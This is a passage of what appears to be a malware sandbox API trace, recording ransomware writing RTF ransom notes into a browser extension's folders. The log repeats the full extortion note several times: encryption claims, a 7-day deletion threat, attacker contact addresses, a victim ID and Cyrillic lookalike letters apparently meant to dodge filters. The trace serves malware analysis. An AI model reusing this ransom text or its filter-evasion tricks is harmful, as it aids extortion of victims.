g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.316] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.317] CloseHandle (hObject=0x2e8) returned 1 [0289.317] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0289.317] GetLastError () returned 0x2 [0289.317] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.317] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.318] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.318] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 